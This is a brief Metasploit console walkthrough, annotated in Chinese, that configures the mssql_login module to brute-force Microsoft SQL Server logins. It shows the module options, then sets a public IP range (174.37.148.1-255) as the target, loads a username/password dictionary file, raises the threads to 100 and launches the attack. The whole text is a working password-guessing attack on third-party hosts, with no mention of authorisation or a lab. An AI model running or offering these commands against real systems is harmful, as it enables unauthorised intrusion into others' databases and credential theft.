msf > use auxiliary/scanner/mssql/mssql_login   //进入模块
 
msf auxiliary(mssql_login) > show options    //查看信息  YES的是必须填写的
 
Module options:
 
   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   true             yes       Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   RHOSTS                             yes       The target address range or CIDR identifier
   RPORT             1433             yes       The target port
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads
   USERNAME          sa               no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts
 
msf auxiliary(mssql_login) > set RHOSTS 174.37.148.1-255    //写入IP
RHOSTS => 174.37.148.1-255
msf auxiliary(mssql_login) > set USERPASS_FILE /1.txt         //写入字典
USERPASS_FILE => /1.txt
msf auxiliary(mssql_login) > set THREADS 100            //写入线程
THREADS => 100
msf auxiliary(mssql_login) > exploit                         //运行